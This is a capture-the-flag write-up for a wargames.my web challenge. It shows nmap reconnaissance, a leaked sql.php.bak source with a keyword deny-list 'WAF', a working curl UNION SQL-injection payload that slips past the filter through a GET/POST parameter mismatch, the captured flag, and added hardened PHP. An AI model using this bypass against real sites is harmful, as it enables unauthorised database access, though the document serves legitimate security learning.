It’s too late for me to submit the flag..lol!
So the challenge is:
So I heard you're hacker. I setup Super Next Gen. AumWAF to protect my l33t website.
Please hack my website. Thanked!
http://supernext-gen-aumwaf.wargames.my/
Webpage:

sql.php page:

As expected, any SQL injection attempt returns an error message like the one below:

Nmap result: notice the “/*.bak” entry in robots.txt

```
root@kali:~/Desktop/htb/olympus# nmap -sS -sC supernext-gen-aumwaf.wargames.my -p 80
Starting Nmap 7.70 ( https://nmap.org ) at 2018-10-08 04:17 EDT
Nmap scan report for supernext-gen-aumwaf.wargames.my (128.199.161.191)
Host is up (0.0041s latency).

PORT   STATE SERVICE
80/tcp open  http
| http-robots.txt: 4 disallowed entries
|_/ /aumwaf.php /flag.php /*.bak
|_http-title: Protected by Next-Gen AumWAF

Nmap done: 1 IP address (1 host up) scanned in 2.57 seconds
```
Let’s check whether a backup file exists: sql.php.bak -> Yes!! It does exist!!

PHP file source code (sql.php.bak; $mysqli is a connection opened elsewhere, not in this file):

```php
<?php
if( isset($_REQUEST['id']) ) {
    // The "WAF": a keyword deny-list, applied to $_REQUEST['id'] ...
    if(preg_match("/'?(?:\w*)\W*?[a-z].*(R|ELECT|OIN|NTO|HERE|NION)/i", $_REQUEST['id'])){
        die("Your request has been blocked by AumWAF");
    }
    // ... but the query is built from $_GET['id'], which is never filtered
    $sql = $mysqli->query('SELECT * FROM tbl_hackme WHERE id = ' . $_GET['id']);
    if($mysqli->error) {
        echo($mysqli->error);
    } else {
        $data = $sql->fetch_object();
        echo $data->col1;
    }
}
?>
```
First, I noticed $_REQUEST['id'] was sent to the filter, but $_GET['id'] was sent to the query function. After some research I learnt that $_REQUEST gets values from $_GET, $_POST and $_COOKIE respectively. This is the default order defined in the php.ini file and can be changed. [seriously, I copied this info from somewhere]
The idea is to send the request as a POST while keeping the GET parameters in the URL. Since the POST value of id overwrites the GET value in $_REQUEST['id'], the filter only ever sees the harmless POST value, and our $_GET['id'] parameter reaches the query free from the filter.
So, to get the flag (a hint was provided):

```
root@kali:~/Desktop/CTF/wgmy-nano# curl -d "id=dummy" "http://supernext-gen-aumwaf.wargames.my/sql.php?id=1+and+1=2+union+select+1,flag,3+from+tbl_flag"
<style type="text/css">
body {
    display: block;
    font-family: consolas !important;
    white-space: pre;
    font-size: 12px;
    margin: 1em 0px;
}
</style>
wgmy{aumwaf_1z_th3_b3st_w4f}
```
Flag: wgmy{aumwaf_1z_th3_b3st_w4f}
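As an added example (not the challenge's code or the author's), here is how sql.php could close the gap used above: validate exactly the value the query uses, with an integer allow-list instead of a keyword deny-list, and bind it as a parameter. A small helper also reproduces how PHP merges GET and POST into $_REQUEST, which is the root of the mismatch. It assumes $mysqli is an open mysqli connection; merge_request and fetch_col1 are names chosen here.

```php
<?php
// Added example, not the challenge's code. $mysqli is assumed to be an open
// mysqli connection, as the backup file itself assumed.

// Reproduces how PHP fills $_REQUEST: sources are registered in request_order
// (default "GP": GET then POST), and a later source overwrites an earlier one.
// This is why the original check and the original query could see different
// values for the same key.
function merge_request(array $get, array $post, array $cookie, string $order = 'GP'): array
{
    $sources = ['G' => $get, 'P' => $post, 'C' => $cookie];
    $request = [];
    foreach (str_split(strtoupper($order)) as $letter) {
        foreach ($sources[$letter] ?? [] as $key => $value) {
            $request[$key] = $value;
        }
    }
    return $request;
}

// Hardened handler: read from ONE source, validate the exact value the query
// uses (allow-list: positive integer), and bind it as data, never as SQL text.
function fetch_col1(mysqli $mysqli, array $get): ?string
{
    if (!isset($get['id'])) {
        return null;
    }
    $id = filter_var($get['id'], FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    if ($id === false) {
        http_response_code(400);
        return null;
    }
    $stmt = $mysqli->prepare('SELECT col1 FROM tbl_hackme WHERE id = ?');
    $stmt->bind_param('i', $id);
    $stmt->execute();
    $row = $stmt->get_result()->fetch_object();
    $stmt->close();
    return $row ? $row->col1 : null;
}

// merge_request(['id' => '<GET value>'], ['id' => 'dummy'], []) yields ['id' => 'dummy']:
// a check on $_REQUEST['id'] inspects "dummy" while $_GET['id'] still holds the GET value.
// The handler below never consults $_REQUEST, so no such shadowing is possible.
echo htmlspecialchars((string) fetch_col1($mysqli, $_GET), ENT_QUOTES, 'UTF-8');
```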
Credit:
1. https://www.pwndiary.com/write-ups/sec-t-ctf-2017-naughty-ads-write-up-web200/
2. Ramadhan -> improvised my curl request.